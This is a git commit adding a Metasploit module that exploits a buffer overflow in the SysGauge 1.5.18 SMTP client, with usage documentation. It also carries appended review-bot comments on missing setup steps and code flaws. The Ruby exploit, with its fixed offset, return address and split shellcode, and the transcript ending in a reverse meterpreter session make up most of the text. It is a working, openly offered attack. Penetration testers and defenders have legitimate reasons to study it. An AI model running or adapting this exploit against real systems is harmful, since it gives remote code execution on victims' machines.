Add sysgauge_client_bof module and documentation

bug/bundler_fix
Chris Higgins 2017-03-14 23:29:19 -05:00
parent e96013cd0f
commit cc4f18e6c5
2 changed files with 126 additions and 0 deletions


@ -0,0 +1,39 @@
## Vulnerable Application
This module will setup a SMTP server expecting a connection from SysGauge 1.5.18
via its SMTP server validation. The module sends a malicious response along in the
220 service ready response and exploits the client resulting in an unpriviledged shell.
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: ```use exploit/windows/smtp/sysgauge_client_bof```
4. Do: ```set payload windows/meterpreter/reverse_tcp```
5. Do: ```set LHOST ip```
6. Do: ```run```
7. The user should put your `SRVHOST` or other applicable IP address in the SMTP configuration
in the program, and hit the "Verify Email ..." button.
8. You should get a shell.
## Scenarios
Here is how to typically execute the module. Note that the client must input this SMTP server
information under SysGauge Options and hit the "Verify Email ..." button.
```
msf > use exploit/windows/smtp/sysgauge_client_bof
msf exploit(sysgauge_client_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(sysgauge_client_bof) > set lhost 10.0.0.1
lhost => 10.0.0.1
msf exploit(sysgauge_client_bof) > exploit
[*] Exploit running as background job.
msf exploit(sysgauge_client_bof) >
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Server started.
[*] Client connected: 10.0.0.128
[*] Sending payload...
[*] Sending stage (957487 bytes) to 10.0.0.128
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.128:49165) at 2017-03-14 23:15:04 -0500
```
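Review bot: neither the Verification Steps nor the Scenarios transcript ever sets `SRVHOST` or `SRVPORT`, yet step 7 tells the user to type "your `SRVHOST`" into SysGauge, and the module's only registered option defaults `SRVPORT` to 25, which needs elevated privileges to bind on most systems and will collide with any local MTA. Add an explicit step between "set LHOST ip" and "run" such as `set SRVHOST ip` (and `set SRVPORT 25` or an alternate port if 25 is unavailable), and mirror it in the scenario so the listener address the user enters in SysGauge is unambiguous. Two smaller points: "unpriviledged" in the Vulnerable Application paragraph should read "unprivileged" (the same typo is in the module's Description), and the triple-backtick spans inside the numbered list items (for example "Do: ```use exploit/windows/smtp/sysgauge_client_bof```") render inconsistently as inline code in Markdown; single backticks match the other module docs.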


@ -0,0 +1,87 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
#
# Fuzzer written by corelanc0d3r - <peter.ve [at] corelan.be>
# http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/
#
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::TcpServer
def initialize()
super(
'Name' => 'SysGauge SMTP Validation Buffer Overflow',
'Description' => %q{
This module will setup a SMTP server expecting a connection from SysGauge 1.5.18
via its SMTP server validation. The module sends a malicious response along in the
220 service ready response and exploits the client resulting in an unpriviledged shell.
},
'Author' =>
[
'Chris Higgins', # msf Module -- @ch1gg1ns
'Peter Baris'
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'EDB', '41479' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Payload' =>
{
'Space' => 306,
'Smallest' => true,
'BadChars' => "\x00\x0a\x0d\x20"
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal',
{
'Offset' => 176,
'Ret' => 0x6527635E # call esp # QtGui4.dll
}
]
],
'Privileged' => 'false',
'DisclosureDate' => 'Feb 28 2017',
'DefaultTarget' => 0
)
register_options(
[
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 25 ]),
], self.class)
end
def setup
super
end
def on_client_connect(c)
sploit = "220 "
sploit += rand_text(target['Offset'])
# Can only use the last part starting from 232 bytes in
sploit += payload.encoded[232..-1]
sploit += rand_text(2)
sploit += [target.ret].pack('V')
sploit += rand_text(12)
sploit += make_nops(8)
# And the first part up to 232 bytes
sploit += payload.encoded[0..231]
sploit += "ESMTP Sendmail \r\n"
print_status("Client connected: " + c.peerhost)
print_status("Sending payload...")
c.put(sploit)
end
end
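Review bot: in `on_client_connect`, `sploit += payload.encoded[232..-1]` raises a TypeError whenever the encoded payload is 232 bytes or shorter, because a Ruby string range that starts past the end returns nil, and `'Smallest' => true` explicitly asks the framework to minimise the encoded size, so a small payload selected by the user will crash the handler on the client's first connection rather than fail cleanly. Check `payload.encoded.length` before slicing and bail out with a clear error (or drop `'Smallest'` and document the minimum size the split requires) so the two fixed slices `[232..-1]` and `[0..231]` are always valid. Three style points in the same file: `'Privileged' => 'false'` is the string `'false'`, which is truthy, where the framework expects the boolean `false`; the `def setup / super / end` override does nothing and can be removed; and the header comment crediting "Fuzzer written by corelanc0d3r" with the death-of-an-ftp-client URL is left over from a different module and does not describe anything in this SMTP server module, so it should be removed or replaced with the actual credit for this vulnerability.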